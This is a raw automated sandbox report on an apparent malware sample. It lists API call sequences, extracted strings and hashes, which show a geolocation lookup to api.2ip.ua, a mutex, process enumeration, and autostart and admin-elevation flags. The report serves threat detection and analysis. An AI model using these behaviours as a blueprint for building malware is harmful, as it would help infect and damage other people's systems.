                                                                                                  • __get_sys_err_msg.LIBCMT ref: 05EA676D
                                                                                                  • __invoke_watson.LIBCMT ref: 05EA678B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 4066021419-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: D
                                                                                                  • API String ID: 2102423945-2746444292
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: $$$(
                                                                                                  • API String ID: 2102423945-3551151888
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: U
                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2Q
                                                                                                  • API String ID: 2102423945-1521255505
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 05E2FBF1
                                                                                                    • Part of subcall function 05E1169C: std::exception::_Copy_str.LIBCMT ref: 05E116B5
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FC06
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                  • String ID: TeM$TeM
                                                                                                  • API String ID: 3662862379-3870166017
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 05E0197D: __wfsopen.LIBCMT ref: 05E01988
                                                                                                  • _fgetws.LIBCMT ref: 05DED15C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wfsopen_fgetws
                                                                                                  • String ID:
                                                                                                  • API String ID: 853134316-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 1783060780-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: a0065a62e00489f1dc372492aa6632e6e00c225caede3f3c6eda3b7e3c8223b2
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: 68017B3280415EFBCF1A5F84CC05CEE3F63BB18244B0A9414FA9958838D232C6B2EB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 05EA7A4B
                                                                                                    • Part of subcall function 05EA8140: ___BuildCatchObjectHelper.LIBCMT ref: 05EA8172
                                                                                                    • Part of subcall function 05EA8140: ___AdjustPointer.LIBCMT ref: 05EA8189
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 05EA7A62
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 05EA7A74
                                                                                                  • CallCatchBlock.LIBCMT ref: 05EA7A98
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: a758289b5e2beaf28ff1a68e78f031145c8190463bc1db556c3af24cfbe33e02
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: 5601D733500109BBDF12AF65CC04EDA7BAAFF49758F159014F99969120D732E961DBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:0.8%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:492
                                                                                                  Total number of Limit Nodes:36
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                    • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                    • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                  • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                  • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                  • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,006DAEA8,?), ref: 0041A0BB
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                  • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                    • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                    • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                    • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                  • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                  • API String ID: 2957410896-3144399390
                                                                                                  • Opcode ID: 5f8a304aa6624fcf05a27cac1293d50e699137b1ca381170fbe135d85099863d
                                                                                                  • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                  • Opcode Fuzzy Hash: 5f8a304aa6624fcf05a27cac1293d50e699137b1ca381170fbe135d85099863d
                                                                                                  • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                  • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                  • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                  • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                  • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                  • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                  • API String ID: 3668891214-3807497772
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 622 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 629 40cfb2-40cfb4 622->629 630 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 622->630 631 40d213-40d217 629->631 635 40d000-40d01d 630->635 633 40d224-40d236 631->633 634 40d219-40d221 call 422587 631->634 634->633 637 40d023-40d02c 635->637 638 40d01f-40d021 635->638 641 40d030-40d035 637->641 640 40d039-40d069 call 4156d0 call 414300 638->640 647 40d1cb 640->647 648 40d06f-40d08b call 413010 640->648 641->641 642 40d037 641->642 642->640 650 40d1cd-40d1d1 647->650 654 40d0b9-40d0bd 648->654 655 40d08d-40d091 648->655 652 40d1d3-40d1db call 422587 650->652 653 40d1de-40d1f4 650->653 652->653 657 40d201-40d20f 653->657 658 40d1f6-40d1fe call 422587 653->658 662 40d0cd-40d0e1 call 414300 654->662 663 40d0bf-40d0ca call 422587 654->663 659 40d093-40d09b call 422587 655->659 660 40d09e-40d0b4 call 413d40 655->660 657->631 658->657 659->660 660->654 662->647 673 40d0e7-40d149 call 413010 662->673 663->662 676 40d150-40d15a 673->676 677 40d160-40d162 676->677 678 40d15c-40d15e 676->678 680 40d165-40d16a 677->680 679 40d16e-40d18b call 40b650 678->679 684 40d19a-40d19e 679->684 685 40d18d-40d18f 679->685 680->680 681 40d16c 680->681 681->679 684->676 686 40d1a0 684->686 685->684 687 40d191-40d198 685->687 688 40d1a2-40d1a6 686->688 687->684 689 40d1c7-40d1c9 687->689 690 40d1b3-40d1c5 688->690 691 40d1a8-40d1b0 call 422587 688->691 689->688 690->650 691->690
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0040CF4A
                                                                                                  • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                  • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                  Strings
                                                                                                  • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                  • "country_code":", xrefs: 0040CFE1
                                                                                                  • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                  • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                  • API String ID: 1485416377-2962370585
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 694 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                  APIs
                                                                                                  • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                    • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                    • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                  • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                  • String ID: i;B
                                                                                                  • API String ID: 2427264223-472376889
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 697 427f3d-427f47 call 427e0e 699 427f4c-427f50 697->699
                                                                                                  APIs
                                                                                                  • _doexit.LIBCMT ref: 00427F47
                                                                                                    • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                    • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                    • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2158581194-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                  • _memset.LIBCMT ref: 004110CA
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                  • _malloc.LIBCMT ref: 00411100
                                                                                                  • _memset.LIBCMT ref: 0041110B
                                                                                                  • _sprintf.LIBCMT ref: 0041112E
                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 2451520719-213608013
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                  • _memset.LIBCMT ref: 0040E98E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                  • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1084002244-213608013
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                  • _memset.LIBCMT ref: 0040EBB4
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                  • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1637485200-213608013
                                                                                                  • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                  • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0040E67F
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _malloc.LIBCMT ref: 0040E68B
                                                                                                  • _wprintf.LIBCMT ref: 0040E69E
                                                                                                  • _free.LIBCMT ref: 0040E6A4
